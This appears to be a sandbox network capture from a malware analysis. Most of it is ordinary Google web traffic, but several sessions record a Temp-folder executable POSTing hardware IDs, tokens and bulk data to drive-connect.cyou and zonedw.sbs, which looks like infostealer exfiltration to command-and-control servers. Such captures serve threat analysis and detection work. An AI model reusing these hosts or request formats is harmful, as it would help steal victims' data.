                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC372INData Raw: 32 61 32 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                Data Ascii: 2a22)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 33 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75
                                                                                                                                                                                                                                                Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700243,3700942,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69
                                                                                                                                                                                                                                                Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this.i
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC1390INData Raw: 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 62 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28
                                                                                                                                                                                                                                                Data Ascii: ow Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"F\");else a\u003d_.be(a);return a};_.de\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC692INData Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c
                                                                                                                                                                                                                                                Data Ascii: uerySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.pe\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"cl
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC427INData Raw: 31 61 34 0d 0a 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 71 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 74 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 72 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f
                                                                                                                                                                                                                                                Data Ascii: 1a4width:\"width\"};\n_.qe\u003dfunction(a){return a?a.defaultView:window};_.te\u003dfunction(a,b){const c\u003db[1],d\u003d_.re(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.jo


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                61192.168.2.450440172.217.19.228443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:55 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                2024-12-13 12:54:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                62192.168.2.450448172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:57 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=22XR8U9GFQ
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 29519
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:54:57 UTC15331OUTData Raw: 2d 2d 32 32 58 52 38 55 39 47 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 32 58 52 38 55 39 47 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 32 58 52 38 55 39 47 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 32 32 58 52 38 55 39 47 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                Data Ascii: --22XR8U9GFQContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--22XR8U9GFQContent-Disposition: form-data; name="pid"1--22XR8U9GFQContent-Disposition: form-data; name="lid"FATE99--test--22XR8U9GFQContent-D
                                                                                                                                                                                                                                                2024-12-13 12:54:57 UTC14188OUTData Raw: 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da cf af 82 84 7b 17 55 3b cb 03 b6 af
                                                                                                                                                                                                                                                Data Ascii: QKnm7>5OEK?6V,i<0egW\ro`#R\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_|x5mDom;z/o^R=ZHMyd01_1mX]rT{U;
                                                                                                                                                                                                                                                2024-12-13 12:55:00 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=hbjtgakrg5j769cfjbhtq4862o; expires=Tue, 08-Apr-2025 06:41:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWQU2SIgBE3FSZ2HuAn34Ybrk89NzjkNfpb%2BUcLeUIWdeKJxjMpOAfAtK%2Fy828TxLcZb7jEjhjWg82p%2Fpe%2B4HdWWk7Hv0iu71oYZm0uoznSPfYL1BpjujIt7%2BnZByyAYVgJJHp0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161b124e425e66-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=640&sent=18&recv=35&lost=0&retrans=0&sent_bytes=2846&recv_bytes=30497&delivery_rate=1706604&cwnd=182&unsent_bytes=0&cid=d70dd6f55a38212a&ts=3197&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:55:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:55:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                63192.168.2.450452116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:58 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Z58QQQ16FUSJMYM7YUKX
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 505
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:58 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 38 51 51 51 31 36 46 55 53 4a 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 38 51 51 51 31 36 46 55 53 4a 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 38 51 51 51 31 36 46 55 53 4a 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------Z58QQQ16FUSJMYM7YUKXContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------Z58QQQ16FUSJMYM7YUKXContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------Z58QQQ16FUSJMYM7YUKXCont
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                64192.168.2.450454116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:59 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----VAS26F37QIEUAAI5FUAS
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 213453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
